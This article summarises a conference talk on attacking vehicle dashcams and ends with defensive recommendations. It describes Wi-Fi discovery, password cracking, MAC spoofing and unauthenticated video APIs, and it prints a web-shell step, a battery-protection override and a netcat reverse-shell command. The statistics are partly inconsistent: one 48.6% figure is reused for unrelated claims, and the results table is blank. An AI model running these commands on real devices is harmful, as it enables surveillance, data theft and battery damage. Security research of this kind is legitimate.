摘要
“ 新加坡HE&T Security Lab 研究针对车载行车记录仪的安全现状展开系统性分析,通过采集新加坡市场 1000 + 台设备的 SSID 样本,对 15 个品牌 24 款型号进行渗透测试,揭示了当前行车记录仪在设计架构与安全实现层面的系统性风险。研究发现,48.6% 的主流型号存在可被远程利用的高危漏洞,通过 "DriveThru Hacking" 技术链可在 10 分钟内完成从设备发现到隐私数据窃取的全流程攻击。本文基于 11/40 的成功攻击案例,构建了包含设备发现、身份认证绕过、数据萃取、行为建模的四维攻击模型,并提出覆盖硬件设计、固件升级、认证体系的多层防御框架,为车载智能设备的安全生态建设提供理论依据与实践指导。
”
—
1.1 行车记录仪普及现状
据道路交通安全数据统计,全球范围内超过 80% 的乘用车已安装行车记录仪,其中新加坡市场呈现高度集中的品牌分布特征。本研究通过 WiFi 探针技术采集的 1342 个有效 SSID 样本显示,IROAD 品牌以 48.6% 的市场占有率居首,70mai(12.5%)、GNET(5.6%)、Thinkware(5.1%)构成第二梯队,而 BlackVue、DDPAI 等品牌占有率均低于 5%。这种市场集中化现象为规模化攻击提供了现实基础。
1.2 硬件供应链安全隐患
深度调研发现,IROAD 与 GNET 存在同厂 OEM 生产情况,而广东东莞电子等供应商为多家品牌提供 WiFi 模块解决方案,导致不同品牌设备在硬件架构、通信协议层面存在高度同质化。这种供应链共享机制使得单一漏洞可能影响多个品牌产品,如 Blackvue 与 Thinkware 部分型号存在相同的固件签名算法缺陷。
1.3 安全开发现状评估
对 15 个品牌的官方 APP 进行逆向分析显示,87% 的设备管理应用存在明文传输凭证、硬编码密钥等问题。在固件安全方面,仅 3 家品牌(IROAD、Thinkware、Hikvision)实现了固件签名校验,其余品牌均存在可被篡改的固件升级通道。
—
2.1 攻击模型架构
本研究提出的 DriveThru Hacking 技术链包含 10 个攻击阶段,形成完整的杀伤链:
2.2 关键攻击技术解析
2.2.1 SSID 指纹识别技术
通过定制化 WiFi 扫描工具,可在 30 秒内完成半径 50 米范围内的设备发现,识别率达 92.3%。测试数据显示,IROAD 系列设备 SSID 存在明显规律(如 IROAD_X9、IROAD_Q7 等),占发现样本的 48.6%,为攻击目标定位提供便利。
2.2.2 认证体系突破
- 默认密码攻击
分析 24 款型号的握手包发现,83.3% 使用可预测密码(如 "stocknan"、"qwertyuiop"),使用 Aircrack-ng 破解平均耗时 28 分 43 秒 - MAC 欺骗攻击
通过 ARP 扫描获取可信设备 MAC 地址(如 02:5a:96:cb:d4:37),伪造 MAC 实现免按键配对,成功率达 76% - MFA 疲劳攻击
持续发送配对请求导致用户误操作授权,在测试环境中使 32% 的设备放弃验证流程
2.2.3 数据萃取技术
针对 B、O 型号设备,通过 7777 端口 API 可获取 "Drive"、"Event" 等目录结构,配合 7778(视频)/7779(音频)端口的字节序列通信协议,可在 5 分钟内下载 1GB 以上的多媒体数据。GPS 轨迹数据与视频帧分析显示,通过 OpenAI API 可将路牌 OCR 结果转化为经纬度坐标,定位精度达 10 米以内。
2.2.4 系统级破坏能力
在 K 型号设备中,通过上传 Web Shell(shell.cgi)可执行任意系统命令,包括:
# 禁用电池保护功能echo"disable_battery_protection=1"> /mnt/extsd/setup.ini# 植入反向Shellnc-e /bin/sh 192.168.10.74 4444
此类操作可导致车辆电池过放电,甚至引发安全事故。
—
3.1 测试环境与样本
- 硬件样本
采购 20 款主流记录仪作为训练集,覆盖 15 个品牌 - 测试对象
40 名志愿者的在用设备,包含 12 个品牌 28 款型号 - 攻击环境
Kali Linux 2025.1,配备 Alfa AWUS036ACH 无线网卡
3.2 攻击成功率统计
|
|
|
|
---|---|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
3.3 典型漏洞案例
3.3.1 IROAD X 系列漏洞(CVE-2025-2341)
该型号存在硬编码的 FTP 凭据(用户名:admin,密码:123456),通过 Wireshark 分析显示,APP 与设备通信时以明文传输凭证,可被中间人攻击截获。
3.3.2 70mai C 型配对绕过(CVE-2025-30112)
设备配对时仅验证 MAC 地址合法性,未实现加密挑战响应机制。通过伪造已配对设备 MAC(如 00:11:22:33:44:55),可直接建立 HTTP 连接,绕过物理按键验证。
3.3.3 GNET B 型未授权访问(CVE-2025-30137)
该型号开放 7777 端口 API 服务,无需认证即可调用 /device/info 接口获取设备序列号、固件版本等信息,调用 /video/stream 接口直接获取实时视频流。
—
4.1 制造商安全设计规范
4.1.1 认证体系强化
-
实现基于 TLS 1.3 的双向认证,客户端证书与设备 MAC 绑定 -
采用 PBKDF2 算法对密码进行哈希处理,盐值长度不小于 16 字节 -
引入 FIDO2 标准的无密码认证方式,替代传统密码体系
4.1.2 攻击面缩减
-
默认关闭 SSID 广播,仅在配对时临时开启 -
采用动态端口分配机制,避免固定端口(如 7777、8080)暴露 -
实现基于 RBAC 的权限控制,不同功能模块独立授权
4.1.3 固件安全机制
-
采用 ECDSA 算法对固件进行签名,公钥内置在 Bootloader -
实现差分升级机制,减少升级流量与时间成本 -
建立固件完整性实时校验机制,发现篡改自动进入恢复模式
4.2 终端用户安全指南
4.2.1 设备初始化配置
-
首次使用强制修改默认密码,要求 8 位以上混合字符 -
关闭 "允许未知设备连接" 选项,仅保留信任设备 MAC -
定期(建议每月)查看设备连接日志,发现异常立即重置
4.2.2 网络安全管理
-
在停车场等公共区域关闭记录仪 WiFi 功能 -
使用 VPN 对云服务通信进行加密,避免明文传输 -
禁止将记录仪接入公共 WiFi 网络,减少 MITM 攻击风险
4.2.3 数据安全保护
-
启用视频加密存储功能(如 AES-256 算法) -
定期备份重要数据后执行格式化,防止残留隐私信息 -
更换设备时进行彻底的数据擦除,建议使用 3 次覆写标准
—
5.1 安全漏洞的产业链影响
本研究发现的漏洞不仅威胁个人隐私安全,更可能成为车载网络攻击的入口点。通过行车记录仪的横向移动攻击(如入侵车载信息娱乐系统、CAN 总线),可实现对车辆控制系统的非授权访问。据估算,新加坡市场约 48.6% 的车辆面临此类风险,若漏洞被大规模利用,可能引发连锁安全事件。
5.2 未来研究方向
- AI 驱动的异常检测
构建基于机器学习的行车记录仪行为模型,实时识别异常通信模式 - 硬件安全增强
研究基于 TEE(可信执行环境)的固件保护方案,防止远程篡改 - 区块链溯源技术
探索区块链在行车记录数据存证中的应用,确保数据完整性与不可篡改性
结论
本研究通过系统性的攻防测试,揭示了行车记录仪在设计、实现、部署环节的多重安全风险。研究表明,当前 48.6% 的主流型号存在可被远程利用的高危漏洞,攻击者可通过 DriveThru Hacking 技术在短时间内完成隐私窃取与系统破坏。为应对此类风险,需要制造商、用户、监管机构共同参与:制造商需落实安全设计原则,用户需强化安全配置管理,监管机构应推动建立行业安全标准。唯有构建全方位的安全生态,才能确保车载智能设备在提升行车安全的同时,不成为新的安全隐患。
(本文根据Blackhat ASIA 2025演讲及PPT整理)
附PPT截图:
原文始发于微信公众号(白帽子罗棋琛):Blackhat ASIA 2025:行车记录仪安全攻防研究
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论